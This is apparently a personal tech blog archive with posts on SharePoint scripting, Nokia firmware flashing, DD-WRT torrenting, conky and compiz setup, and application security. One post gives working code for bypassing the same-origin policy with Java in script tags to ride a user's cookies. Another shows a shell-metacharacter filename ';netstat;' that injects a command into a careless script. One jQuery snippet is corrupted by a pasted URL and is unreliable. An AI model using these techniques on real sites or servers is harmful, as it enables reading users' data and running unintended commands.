My thoughts on application security

DOM level JavaScript: How to get Date fields in MOSS 2007 to appear as Age

2011-05-12T04:39:00.000-07:00

We were looking for a way to display the age of an entry in SharePoint list for which creation date was specified. Since now using [today] in formula in SharePoint is not allowed, and we did not want to create redundant fields, we decided to weave a DOM level JavaScript to change the date value to Age, based on the today's date. Here's the code to use to replace date with age:

<script> $("#tableID nobr").each(function(){ var c = new Date($(this).text()); var b = nehttp://www.blogger.com/img/blank.gif7; Date(); var diff = (b.getTime() - c.getTime())/(24*3600*1000); $(this).html(Math.ceil(diff) + " days");}) </script>

Here's another use of DOM level javascript, used to unlock levels in angry birds chrome.

Notes on flashing nokia 5230 with nokia c6 firmware

2011-05-08T21:45:00.000-07:00

First of all, my thanks to Rohit for his great work on porting the c6 firmware on nokia 5230. You can read about his work here.

Now, I have a nokia 5230 which comes with a good firmware, but unlike the more expensive c6 or c7 does not come with the nokia widget screen. So here are the steps used.

BACKUP YOUR PHONE BEFORE YOU DO THIS.

1. Download the latest port and core FW for your phone. Make sure you download the FW for your existing firmware version (use *#0000# on you device to know your FW version).

2. Copy all the files downloaded to this location (Here RM-588 is product version info from the same screen, make sure you have ovi suite installed)
C:\Program Files (x86)\Nokia\Phoenix\Products\RM-588

3. So here's what I have in my nokia location:

Directory of C:\Program Files (x86)\Nokia\Phoenix\Products\RM-588

RM-588_40.0.003_prd.core.C00
RM-588_40.6.003_prd.rofs2.V21
RM588_0585690_40.0.003_001.dcp
RM588_0585690_40.0.003_001.vpl
RM588_0585690_40.0.003_001_signature.bin
RM588_40.0.003_001_001_U001.uda.fpsx

3. Now you must install JAF, and downlaod JAF pkey Emulator.

4. Then use this tutorial to flash the phone.

5. In case you have an old copy of JAF, the ini file will not show you device. Use the below device string for nokia 5230:

[RM-588]
Description=Nokia 5230 CABLE
_prd.rofs2.v01=English,Finnish,Swedish,Norway,Islandic,Danish
_prd.rofs2.v02=English,French,Turkish,German,Dutch
_prd.rofs2.v03=English,French,German,Italian,Spanish,Portuguese
_prd.rofs2.v04=English,German,Estonian,Russian,Lativian,Lithuanian
_prd.rofs2.v05=English,German,Hungarian,Ukrainian,Russian,Romanian,Bulgarian
_prd.rofs2.v06=English,Czech,Slovakian,German,Polish,Hungarian
_prd.rofs2.v07=English,German,Croatian,Serbian,Greek
_prd.rofs2.v08=English,Hebrew,Arabic,Russian,Spanish
_prd.rofs2.v09=English,Romanian,Russian,Spanish
_prd.rofs2.v11=English,Arabic,French
_prd.rofs2.v12=English,Arabic,Farsi
_prd.rofs2.v13=English,Arabic,Farsi,Urdu
_prd.rofs2.v14=English,Arabic,French
_prd.rofs2.v18=English,Thailand,Chinese Simpl,Chinese Trad
_prd.rofs2.v19=English,Philipines,Bangladesh,Australia,Indonesia,India,Vietnam,New Zealand
_prd.rofs2.v20=English,Vietnamese,Tagalog,Chinese Simpl,Chinese Trad
_prd.rofs2.v22=English,Singapore,Indonisia,Malasia
_prd.rofs2.v23=English,Chinese Simpl,Chinese Trad (Hong Kong)
_prd.rofs2.v24=English,Simpl Chinese,Trad Chinese

How to workaround the Same origin policy using crossdomain.xml and Java in <script> tags

2011-04-27T06:36:00.000-07:00

I was just messing around with calling java classes in JavaScript (ff4) when it registered, that one can use a lenient crossdomain.xml policy for java.net to make request and response to a completely different server in applet container, therefore working around the cross domain policy.

So I started with Flickr (since there are many flicker applet apps from which feed connection code can be borrowed), below is the cross domain policy on api.flickr.com.

http://api.flickr.com/crossdomain.xml

Then I borrowed the applet code (a hello world example on how to use java.net), and modified the same to execute in JavaScript tags and fetch the Flickr atom feed. The result is the request response from blogger to flickr (you can also call alert() if you prefer, as with below example) textbox with the response to the Flickr feeds request.

Currently works only on firefox. Compare with original feed

var urlStr = new java.net.URL("http://api.flickr.com/services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom");
var urlCn = urlStr.openConnection();
var a = new java.io.BufferedReader(new java.io.InputStreamReader(urlCn.getInputStream()));
var b = urlCn.getHeaderField(0);
b = b+"\n"+urlCn.getHeaderFieldKey(1)+": "+urlCn.getHeaderField(1);
b = b+"\n"+urlCn.getHeaderFieldKey(2)+": "+urlCn.getHeaderField(2);
b = b+"\n"+urlCn.getHeaderFieldKey(3)+": "+urlCn.getHeaderField(3);
b = b+"\n"+urlCn.getHeaderFieldKey(4)+": "+urlCn.getHeaderField(4);
b = b+"\n"+urlCn.getHeaderFieldKey(5)+": "+urlCn.getHeaderField(5);
b = b+"\n"+urlCn.getHeaderFieldKey(6)+": "+urlCn.getHeaderField(6);
b = b+"\n"+urlCn.getHeaderFieldKey(7)+": "+urlCn.getHeaderField(7);
b = b+"\n\n"
var inputLine = "";
while ((inputLine = a.readLine()) != null)
b = b+"\n"+inputLine;
//c=document.getElementById("page_content")
//c.innerHTML = b;
var f = new java.awt.Frame("TEST");
var ta = new java.awt.TextArea(b, 45, 600);
f.add("Center", ta);
f.pack( );
f.show( );

BTW, the cookies set for flickr.com does go with this api call. This means, if cross domain policy allows, one can call applications actions on flickr.com and use the response (read, export contacts of the logged-in user or change settings).

#	Result	Protocol	Host	URL	Body	Caching	Content-Type	Process	Comments	Custom
113	200	HTTP	api.flickr.com	/crossdomain.xml	265	private	text/xml	java:6600

GET /crossdomain.xml HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Host: api.flickr.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Cookie: BX=2ue9vrd6rhvda&b=3&s=s7; localization=en-us%3Bau%3Bau; search_z=t

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 05:42:03 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Vary: Accept-Encoding
X-Served-By: www151.flickr.mud.yahoo.com
Cache-Control: private
Content-Type: text/xml
Content-length: 265
Connection: Keep-Alive

 <cross-domain-policy> <allow-access-from domain="*"> <site-control policies="master-only"> </site-control></allow-access-from></cross-domain-policy>

#	Result	Protocol	Host	URL	Body	Caching	Content-Type	Process	Comments	Custom
114	301	HTTP	www.macromedia.com	/xml/dtds/cross-domain-policy.dtd	261	max-age=900 Expires: Thu, 28 Apr 2011 05:53:41 GMT	text/html; charset=iso-8859-1	java:6600

GET /xml/dtds/cross-domain-policy.dtd HTTP/1.1
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Host: www.macromedia.com
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Cookie: BCSI-CS9B232E0E=2

HTTP/1.1 301 Moved Permanently
Date: Thu, 28 Apr 2011 05:38:41 GMT
Server: Apache
Location: http://www.adobe.com/xml/dtds/cross-domain-policy.dtd
Cache-Control: max-age=900
Expires: Thu, 28 Apr 2011 05:53:41 GMT
Content-Type: text/html; charset=iso-8859-1
Content-length: 261
Connection: Keep-Alive
Age: 201

<title>301 Moved Permanently</title> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">here</a>.</p>

#	Result	Protocol	Host	URL	Body	Caching	Content-Type	Process	Comments	Custom
116	200	HTTP	api.flickr.com	/services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom	27,652	no-store, no-cache, must-revalidate, private Expires: Mon, 26 Jul 1997 05:00:00 GMT	application/atom+xml; charset=utf-8	java:6600

GET /services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom HTTP/1.1
accept-encoding: gzip
Host: api.flickr.com
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_20
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
If-Modified-Since: Mon, 25 Apr 2011 04:16:01 GMT
Cookie: BX=2ue9vrd6rhvda&b=3&s=s7; localization=en-us%3Bau%3Bau; search_z=t

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 05:42:04 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 04:16:01 GMT
Cache-Control: no-store, no-cache, must-revalidate, private
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-Served-By: www78.flickr.mud.yahoo.com
Content-Type: application/atom+xml; charset=utf-8
Connection: Keep-Alive
Content-Length: 27652

 <feed xmlns="http://www.w3.org/2005/Atom" dc="http://purl.org/dc/elements/1.1/" flickr="urn:flickr:" media="http://search.yahoo.com/mrss/"> <title>Uploads from Joshua Marinacci</title> <link rel="self" href="http://api.flickr.com/services/feeds/photos_public.gne?id=31706743@N00&lang=en-us&format=atom"> <link rel="alternate" type="text/html" href="http://www.flickr.com/photos/joshyx/"> <id>tag:flickr.com,2005:/photos/public/1850619</id> <icon>http://farm1.static.flickr.com/60/buddyicons/31706743@N00.jpg?1184425730#31706743@N00</icon> <subtitle></subtitle> <updated>2011-04-25T04:16:01Z</updated> </feed>

Static code analysis, gone horribly wrong

2010-11-26T13:12:00.001-08:00

It's after long time I am posting anything here. Was busy with family stuff and changing jobs. Anyways.

Recently I was asked (as part of my job) to complete the penetration testing for a legacy application. This was a direct result of reported issues from appsec scanners and fair amount of static code analysis (tools and products will stay un-named here), which issued huge number of critical alerts.

Multiple instances of XSS, SQL injection, Command injection, Buffer overflow etc were reported by both Static code analysis and appsec scanner. So what did we have in the soup. Classic CGI with apache's mod_cgi with log4j logging.

My first thoughts, cocky as always. I start digging; and after two days, I have one high vulnerability. YES, 1, ONE, ένα, एक, JUST ONE.

All scanners threw was false positives. And this one vulnerability is not reported by any scanners. so what's the secret? Well there are quite a few,

1. The application in question went from a command line interface to a web based cloud solution in last 20 years of development.

2. Developers used minimum 3rd part components, and updated these on time.

3. Inherently scanners are designed for generating issues based on pattern matching which at best is complete guess work.

4. Security people running these scans had limited understanding of development technology used or chose to report incorrect over the possibility of incomplete.

Moral of the story,

1. ALL WEBAPP SCANNERS ARE DUMB. Static code analysis is ill equipped for legacy applications.

2. Don't be cocky when you see CGI.

3. Time can't be telescoped. Therefore something that was developed over 20 years by dozens of developers can't be broken in minutes.

4. Inconsistency of development causes flaws in legacy applications.

5. Put in the time to find these development inconsistencies, and you shall be rewarded with few vulnerabilities.

6. Helping fix these bring a lot of satisfaction.

realtime caps lock and num lock notification in ubuntu

2010-06-25T06:18:00.000-07:00

My response for thread at ubuntu forum. Python notification-osd examples helped a lot.

Finally the notification is real tnotification-osd examplesime. I used the update method call from notify-osd using python. I needed a service to run in the background, which can independently create and modify notifications, and two trigger scripts to call the service by dbus.

The dbus service, and two calling scripts were called by python. I used the same xset code in the first reply to get the status of locks.

The archive contains the following files:

1. lock_keys - Service python script, must be running for real-time notification toggle. This require caps shell script for usage.

2. lockNum - trigger python script, used as keyboard binding for num lock.

3. lockCap - trigger python script, used as keyboard binding for caps lock.

4. caps - shell script to identify the status of locks.
USAGE:
$> caps caps
$> caps num

The way to install this is to navigate to download directory and run the following commands:
Quote:
$> tar -xvzf lock_Notify.tar.gz
$> cd lock_Notify/
$> chmod a+x *
$> sudo mv * /bin
[sudo] password for user:

Now open System -> Preferences -> Startup Applications
Add /bin/lock_keys to startup.

Open System -> Preferences -> CCSM,
Add command 1 = lockNum
Add command 2 = lockCap
And add num lock and caps lock shortcuts to these commands from CCSM.

DD-WRT router setup with NAS to download torrents without a computer

2010-06-25T05:29:00.000-07:00

Firstly, Above is NOT my screenshot. Its just there to give you an Idea,

Finally I got around to installing optware on my wrt160N v3 router, and using the router to download torrents to my buffalo NAS (1TB).

I bought the router and the NAS drive at around 150$ (router was a refurbished unit). The router was flashed with DD-WRT (DD-WRT v24-sp2 (04/23/10) std-nokaid-small) firmware which had CIFS support to mount the NAS. Then used the optware installation guide (Option C: Partition-in-a-file on CIFS for /opt)

Some notes and screenshots:

mount.cifs //hd-celu2-2966/share /tmp/smbshare -o sec=none
insmod /tmp/smbshare/loop.ko
insmod /tmp/smbshare/ext2.ko
nvram set sys_enable_jffs2=1
mkdir /tmp/swap
mount --bind /tmp/smbshare/jffs /jffs
mount -o loop /tmp/smbshare/opt.ext2 /opt
mount -o loop /tmp/smbshare/swap.ext2 /tmp/swap
/opt/sbin/swapon /tmp/swap/swapfile
/usr/sbin/iptables -I INPUT 1 -p tcp --dport 25000 -j logaccept
transmission-daemon -g /tmp/smbshare/torrents/.config/transmission-daemon

Then I used chrome to create application shortcut to the transmission web interface. The interface is very functional. I Have been using this interface from psp and my e63 browser (over wifi).

Final Switch to Chrome

2010-01-24T23:23:00.000-08:00

I have finally moved to chrome. The new chrome extensions are awesome (still beta). I still use the firefox for pentest, however chrome with adThwart/adblock and IE-tabs (for Outlook Web Exchange) rocks.

It is a sad indication that Mozilla may again loose the browser war to google, I know that firefox 3.6 is improved, and I love it, but Chrome with extensions is far more powerful and lightweight.

I have been a firefox convert from the time it was launched, and have been addicted to firefox for five years now. I still remember the joy, when I first saw extensions on firefox.

I am saddened. Firefox, you will be missed.

Conky and compiz on my multi monitor setup

2009-11-24T11:14:00.000-08:00

I am running this on a 4 year old laptop, AMD turion 1.8 Ghz, 1 GB Ram. Now my .conkyrc file below, special thx to ubuntu forum conky thread.

# System stats bar

# Create own window instead of using desktop (required in nautilus)
own_window yes
own_window_type panel
own_window_transparent no
own_window_hints undecorated, above, skip_taskbar,skip_pager

# Use double buffering (reduces flicker, may not work for everyone)
double_buffer yes

# fiddle with window
#use_spacer right

# Use Xft?
use_xft yes
xftfont unDotum:size=8
xftalpha 2
text_buffer_size 2048

# Update interval in seconds
update_interval 1.0

# Minimum size of text area
minimum_size 220 5
maximum_width 255

# Draw shades?
draw_shades no

# Text stuff
draw_outline no # amplifies text if yes
draw_borders no
uppercase no # set to yes if you want all text to be in uppercase

# Stippled borders?
stippled_borders 3

# border margins
#border_margin 9

# border width
#border_width 5

# Default colors
override_utf8_locale yes
# Text alignment, other possible values are commented
alignment top_right

# Gap between borders of screen
gap_x 10
gap_y 0

# Possible variables to be used:
#
# Variable Arguments Description
# acpiacadapter ACPI ac adapter state.
# acpifan ACPI fan state
# acpitemp ACPI temperature.
# adt746xcpu CPU temperature from therm_adt746x
# adt746xfan Fan speed from therm_adt746x
# battery (num) Remaining capasity in ACPI or APM
# battery. ACPI battery number can be
# given as argument (default is BAT0).
# buffers Amount of memory buffered
# cached Amount of memory cached
# color (color) Change drawing color to color
# cpu CPU usage in percents
# cpubar (height) Bar that shows CPU usage, height is
# bar's height in pixels
# downspeed net Download speed in kilobytes
# downspeedf net Download speed in kilobytes with one
# decimal
# exec shell command Executes a shell command and displays
# the output in torsmo. warning: this
# takes a lot more resources than other
# variables. I'd recommend coding wanted
# behaviour in C and posting a patch :-).
# execi interval, shell Same as exec but with specific interval.
# command Interval can't be less than
# update_interval in configuration.
# fs_bar (height), (fs) Bar that shows how much space is used on
# a file system. height is the height in
# pixels. fs is any file on that file
# system.
# fs_free (fs) Free space on a file system available
# for users.
# fs_free_perc (fs) Free percentage of space on a file
# system available for users.
# fs_size (fs) File system size
# fs_used (fs) File system used space
# hr (height) Horizontal line, height is the height in
# pixels
# i2c (dev), type, n I2C sensor from sysfs (Linux 2.6). dev
# may be omitted if you have only one I2C
# device. type is either in (or vol)
# meaning voltage, fan meaning fan or temp
# meaning temperature. n is number of the
# sensor. See /sys/bus/i2c/devices/ on
# your local computer.
# kernel Kernel version
# loadavg (1), (2), (3) System load average, 1 is for past 1
# minute, 2 for past 5 minutes and 3 for
# past 15 minutes.
# machine Machine, i686 for example
# mails Mail count in mail spool. You can use
# program like fetchmail to get mails from
# some server using your favourite
# protocol. See also new_mails.
# mem Amount of memory in use
# membar (height) Bar that shows amount of memory in use
# memmax Total amount of memory
# memperc Percentage of memory in use
# new_mails Unread mail count in mail spool.
# nodename Hostname
# outlinecolor (color) Change outline color
# pre_exec shell command Executes a shell command one time before
# torsmo displays anything and puts output
# as text.
# processes Total processes (sleeping and running)
# running_processes Running processes (not sleeping),
# requires Linux 2.6
# shadecolor (color) Change shading color
# stippled_hr (space), Stippled (dashed) horizontal line
# (height)
# swapbar (height) Bar that shows amount of swap in use
# swap Amount of swap in use
# swapmax Total amount of swap
# swapperc Percentage of swap in use
# sysname System name, Linux for example
# time (format) Local time, see man strftime to get more
# information about format
# totaldown net Total download, overflows at 4 GB on
# Linux with 32-bit arch and there doesn't
# seem to be a way to know how many times
# it has already done that before torsmo
# has started.
# totalup net Total upload, this one too, may overflow
# updates Number of updates (for debugging)
# upspeed net Upload speed in kilobytes
# upspeedf net Upload speed in kilobytes with one
# decimal
# uptime Uptime
# uptime_short Uptime in a shorter format
#
# seti_prog Seti@home current progress
# seti_progbar (height) Seti@home current progress bar
# seti_credit Seti@hoome total user credit
#
#
# variable is given either in format $variable or in ${variable}. Latter
# allows characters right after the variable and must be used in network
# stuff because of an argument
#

# stuff after 'TEXT' will be formatted on screen

TEXT

${font Lucida Console:size=50}${color1}${time %H:%M}${font Lucida Console:size=20}${color1}${font Lucida Console:size=20}${time :%S}
${font Lucida Console:size=14}${time %a, %B %d, %Y}
${font Lucida Console:size=10}${color white}SYSTEM ${hr 1}${color}
Hostname: $alignr$nodename
Kernel: $alignr$kernel
Uptime: $alignr$uptime
Temp: ${alignr}${acpitemp}C
Load CPU@${freq}MHz ${alignr}${cpugraph cpu1 20,100}
${voffset -20}$loadavg
Processes: ${alignr}$processes ($running_processes running)

Ram ${alignr}$mem / $memmax ($memperc%)
${membar 4}

Highest CPU $alignr CPU% MEM%
${top name 1}$alignr${top cpu 1}${top mem 1}
${top name 2}$alignr${top cpu 2}${top mem 2}
${top_mem name 2}$alignr${top_mem cpu 2}${top_mem mem 2}

Highest MEM $alignr CPU% MEM%
${top_mem name 1}$alignr${top_mem cpu 1}${top_mem mem 1}
${top_mem name 2}$alignr${top_mem cpu 2}${top_mem mem 2}
${top_mem name 2}$alignr${top_mem cpu 2}${top_mem mem 2}

${color white}Filesystem ${hr 1}${color}

Root: ${alignr}${fs_free /} / ${fs_size /}
${fs_bar 4 /}
BACKUP: ${alignr}${fs_free /media/sda2} / ${fs_size /media/sda2}
${fs_bar 4 /media/sda2}
PSP: ${alignr}${fs_free /media/sda5} / ${fs_size /media/sda5}
${fs_bar 4 /media/sda5}
MUSIC: ${alignr}${fs_free /media/sda6} / ${fs_size /media/sda6}
${fs_bar 4 /media/sda6}

${color white}NETWORK ${hr 1}${color}

IP address: $alignr ${addr wlan0}
Connection quality: $alignr ${wireless_link_qual_perc wlan0}%

Down ${downspeed wlan0} ${alignr}Up ${upspeed wlan0}
${downspeedgraph wlan0 25,107} ${alignr}${upspeedgraph wlan0 25,107}
Total ${totaldown wlan0} ${alignr}Total ${totalup wlan0}

${color white}World Time ${hr 1}${color}

${color}Seattle $alignr${color2}${tztime America/Vancouver %I}:${tztime America/Vancouver %M}${tztime America/Vancouver %p}
${color}New York $alignr${color2}${tztime America/New_York %I}:${tztime America/New_York %M}${tztime America/New_York %p}
${color}London $alignr${color2}${tztime Europe/London %I}:${tztime Europe/London %M}${tztime Europe/London %p}
${color}Bangalore $alignr${color2}${tztime Asia/Calcutta %I}:${tztime Asia/Calcutta %M}${tztime Asia/Calcutta %p}
${color}Hong Kong $alignr${color2}${tztime Asia/Hong_Kong %I}:${tztime Asia/Hong_Kong %M}${tztime Asia/Hong_Kong %p}
${color}Tokyo $alignr${color2}${tztime Asia/Tokyo %I}:${tztime Asia/Tokyo %M}${tztime Asia/Tokyo %p}

${color white}Weather ${hr 1}${color}

${font}$alignr ${execi 300 conkyForecast --location=INXX0012 --datatype=CN}, ${execi 300 conkyForecast --location=INXX0012 --datatype=CO}
$alignr Last Update: ${execi 300 conkyForecast --location=INXX0012 --hideunits --datatype=LU -m 0}
${voffset -40}${color #a6a6a6}${font ConkyWeather:size=85}${execi 300 conkyForecast --location=INXX0012 --datatype=WF}$color
$font${voffset -167}${alignr}Wind: ${execi 300 conkyForecast --location=INXX0012 --datatype=WS} ${execi 300 conkyForecast --datatype=WD}
${alignr}Humidity: ${execi 300 conkyForecast --location=INXX0012 --datatype=HM}
${alignr}Precipitation: ${execi 300 conkyForecast --location=INXX0012 --startday=0 --datatype=PC}
${alignr}Sunrise: ${execi 300 conkyForecast --location=INXX0012 --datatype=SR}
${alignr}Sunset: ${execi 300 conkyForecast --location=INXX0012 --datatype=SS}
${alignc 30}${execi 300 conkyForecast --location=INXX0012 --datatype=CT}: ${execi 300 conkyForecast --location=INXX0012 --hideunits --datatype=HT} $font $alignr Feels Like: ${execi 300 conkyForecast --location=INXX0012 --datatype=LT}

${alignc 7}${execi 300 conkyForecast --location=INXX0012 --startday=0 --endday=4 --spaces=12 --datatype=DW -w}
${color #a6a6a6}${font ConkyWeather:size=26}${execi 300 conkyForecast --location=INXX0012 --spaces=2 --startday=0 --endday=4 --centeredwidth=1 --datatype=WF}$font$color
${alignc 110}${execi 300 conkyForecast --location=INXX0012 --startday=0 --hideunits --datatype=HT}/${execi 300 conkyForecast --location=INXX0012 --startday=0 --hideunits --datatype=LT}${alignc 0}${execi 300 conkyForecast --location=INXX0012 --startday=1 --hideunits --datatype=HT}/${execi 300 conkyForecast --startday=1 --hideunits --location=INXX0012 --datatype=LT}${alignc -40}${execi 300 conkyForecast --startday=2 --hideunits --location=INXX0012 --datatype=HT}/${execi 300 conkyForecast --location=INXX0012 --startday=2 --hideunits --datatype=LT}${alignc -75}${execi 300 conkyForecast --hideunits --location=INXX0012 --startday=3 --datatype=HT}/${execi 300 conkyForecast --location=INXX0012 --startday=3 --hideunits --datatype=LT}${alignc -105}${execi 300 conkyForecast --location=INXX0012 --startday=4 --hideunits --datatype=HT}/${execi 300 conkyForecast --location=INXX0012 --startday=4 --hideunits --datatype=LT}
$alignc${execi 300 conkyForecast --location=INXX0012 --startday=0 --endday=4 --spaces=11 --datatype=PC}

How to enable compiz on multiple display (adding my ubuntu forum post)

2009-11-15T01:09:00.000-08:00

For multiple monitor setups, here's the trick to get the compiz,

Check the GL_MAX_TEXTURE_SIZE using

Code:

glxinfo -l | grep GL_MAX_TEXTURE_SIZE

Mine was 2048, Now we want a horizontal resolution higher than 2048 in compiz. We can just tell compiz to ignore this limitation. BUt I did it the dirty way by changing /usr/bin/compiz script:

Code:

sudo vi /usr/bin/compiz

Here I commented the line, TEXTURE_LIMIT=.... and added TEXTURE_LIMIT=2944.

Now enable compiz with Appearance settings in ubuntu. The wallpaper will be redrawn, Hence we must enable wallpaper compiz plugin from CCSM (compizconfig setting manager).

But to enable wallpaper plugin we must disable nautilus desktop from gconf editor. I used this trick from tombuntu:

Code:

Launch the Run Application dialog with Alt-F2
and run gconf-editor.
Navigate to apps->nautilus->preferences
and unselect the show_desktop option.
Your desktop icons should disappear.
Now enable the wallpaper plugin from CCSM

Now just add the lines as commands to compiz and enjoy

My setup is

Code:

[TV connected to laptop via VGA]
__________     ___________
|1024x768|     |1920x1080|
| laptop |---->| display |
|________|     |_________|
/________/

win+1 --> move to laptop display

Code:

bash -c "wmctrl -r :ACTIVE: -b remove,maximized_horz && wmctrl -r
:ACTIVE: -b remove,maximized_vert ;wmctrl -r :ACTIVE: -e 0,0,0,1024,768"

win+2 --> move to VGA left half display (external monitor)

Code:

bash -c "wmctrl -r :ACTIVE: -b remove,maximized_horz && wmctrl -r
:ACTIVE: -b remove,maximized_vert ;wmctrl -r :ACTIVE: -e 0,1025,0,960,1080"

win+3 --> move to VGA right half display (external monitor)

Code:

bash -c "wmctrl -r :ACTIVE: -b remove,maximized_horz && wmctrl -r
:ACTIVE: -b remove,maximized_vert ;wmctrl -r :ACTIVE: -e 0,1985,0,960,1080"

want win+3 --> restore to original pos (does not work sometimes)

Code:

bash -c "wmctrl -r :ACTIVE: -b toggle,maximized_vert && wmctrl -r
:ACTIVE: -b toggle,maximized_horz;"

Ubuntu usb disk install with broadcom bm4318 drivers and Xorg tweak

2009-09-30T11:01:00.003-07:00

I just created a rescue / work thumb drive for by laptop. I used the ubuntu usb startup disk creator. Since I already have a working ubuntu, I also made my wifi card firmware for ubuntu available to my ubuntu startup disk (Pendrive).

you must download the ubuntu iso image from here (opens in a new page)

step 1:
The candidate for this experiment was my old 1Gb pendrive (Kingston). Format this to fat32. I used gparted for the same.

step 2. Start usb disk creator from ubuntu menu:
System--> Adminstration --> Usb Startup disk creator.

Select the iso image and pendrive details (settings stored in reserved extra space (150 mb)), and press 'Make Startup disk' button.

step 3. Once step2 is complete, reboot from your usb.

Step 4. Now ubuntu (USB) should boot, once it is done, mount your linux partition. (From Places-->Removable Media --> your linux partion)
Mine is mounted in /media/sda1

Step 5. Copy the contents from /media/sda1/lib/firmware/ to your /lib/firmware/
   $ sudo cp /media/sda1/lib/firmware/ /lib/firmware/

Step 6. Start System--> Adminstration -->Hardware Drivers and click on activate. It should now activate your wifi drivers copied from the firmware directory. ifnot, try deactivating and activating the driver by:
    $ sudo rmmod b43
    $ sudo modprobe b43legacy

Step 7. If you use multiple head laptop setup, configure a init.d job to restore the xorg.conf file.
              $ sudo cp /media/sda1/etc/X11/xorg.conf /etc/xorg.conf.dualHead
         $ sudo echo "#!/bin/bash;cp /etc/xorg.conf.dualHead /etc/xorg.conf;" > /etc/init.d/restoreXorgConf
   $ sudo chmod +x   /etc/init.d/restoreXorgConf; sudo ln -s /etc/init.d/restoreXorgConf /etc/rc2.d/S29resetXorgConf
Step 8. Reboot

How security companies certify produts

2009-09-27T05:52:00.000-07:00

We see all over the place, web facing payment applications. We buy everything online these days. Even in India, I don't remember the last time I got any tickets from a physical reservation window. We pay bills, buy groceries, transfer money, trade shares, manage savings, plan travel, etc etc over online systems which to the naked eye look safe. Now the question is how many of these are actually safe. Well, that is something subjective, but let me tell you this; Most companies spend less that 1% of the total development / deployment and maintinance cost on security. And most of this 1% is spent on generic systems, which protect network, firewall and maintain DMZs, Unix accounts, physical security.

But we as an industry do not spend on the security of the actual product. Don't get me wrong here, the money spent in security is necessary, but we must closely look at how we certify our products (web facing / Internet applications). In this blog, (over some parts) I'll try to enumrate security controls in our applications, and where are the loop holes.

1. Blacklisting Parameters: I see code all the time, a lot of it in most cases is of web facing apps. What I see that I do not like? Well, till now (even in modern spring and strusts frameworks) most models of SDLC still depend on blacklisting parameters, this is because security in most cases is an afterthought. Architects (and security experts) have come to accept the afterthought model of security. The problem is that repetative model of development does not improve security. But why is the practice not stopped, well lack of evidence. Most development model favour towards automated tests, this means that the art of hacking get compromised to an excercise in test case execution, completly ignoring context of the application.

Now I got to go, and do better things than ranting. I'll get back to the subject of the blog, once I get back to writing.

Log forging, logic bombs and Command injection ??

2009-09-26T02:20:00.000-07:00

Developers think that log forging was not as dangerous as command injection. Often an application log name can be changed by the vary many types of parameter tampering. But these bugs are marked as medium risk. However we take the premise that the application will never execute the logs, hence it is not directly exploitable. But how many of us look at the automation associated with a production environment when we audit applications.

More often, production applications are manned by Unix admins who put cheap and dirty shell pipes and scripts to archive / search / list the log files. No one reviews those set of cheap and dirty automations. Where I am getting at? lets see..

Assume that I have a file system, where I want to find out specific types of files (Just an example), so I write a dirty automation like below:

~$> ls -falrt | grep -v "drwx" | awk {'if ($8 != NULL) {print "file " $8 $9}'} | sh | grep -i png

now, one would thing the above command, which does the following steps:
1. list files
2. greps out directories
3. awk for file names (which are not null). And creates the 'file ' command
4. shell to execute the above
5. Grep for png images.

what would happen, if I don't input validate filenames? understand that unix support the complete ascii char set for file naming, so a filename like ;netstat; is completely valid and possible (by a log tampering vulnerability).

~$> touch \;\ netstat\ \;

so what happens when i run the previous dirty script? Well I just accidentally trigger netstat command. Obviously there are other royal ways to screw people that netstat.Imagine what is possible with root binaries / cron jobs etc.

Now the question is how to check this? Just input validate everything that is created on your production server. And deploy better tested shell scripts.

Pentesting serial object (SO) applications like smartclients :: IN CONCEPT

2009-05-18T04:31:00.000-07:00

Lets address the problem of serial object communication in web applications using the sniff and edit method. The problem with using a servlet to cast objects is that the request can’t be kept in motion for server and client to interpret.

One look at the request header:

Content-Type: application/octet-stream

This stream data must be cast to an object to retrieve and edit data.

To capture the request and response there is the old /etc/hosts and reverse proxy trick, to fool the smart client to point to a local running reverse proxy. This will still not interpret the serial object from the client. We need some bean shell code to offset this odd.

The solution is to modify web scarab to function as an object decoder and reverse proxy.

So creating a new transparent layer with reverse proxy setup is a solution to testing SO objects.

Let’s see the server side code to interpret this octet-stream which will cast the stream to a class object at server side. I am writing java code here, but the idea pretty much remains the same for the beanshell. I can’t disclose any legacy/proprietary information in the code.

protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

PrintWriter pw = response.getWriter();

try{printRequest(request, pw);}

catch (Exception e) {pw.write("\nCaught Exception: " + e);}

pw.flush();}

public void printRequest(HttpServletRequest req, PrintWriter pw)

{ObjectInputStream objInStream = new ObjectInputStream(servletinputstream);

RequestObject o1= (RequestObject)objInStream.readObject();

...some data processing with serial array type objects...

pw.write("\n**********Request data********:\n");

pw.write("\no1.toString="+o1.toString());}

One will have to fetch the request and response object class from the jars/libs downloaded in the temporary folders by the application (use any process monitor to fetch the library/jar names used by the process). The process can be replicated with HTTPS communication.

Some Basic assumptions for smart client applications:

1. We talk of smart clients where proxy can’t be configured.

2. Smart Client applications work using http wrapper.

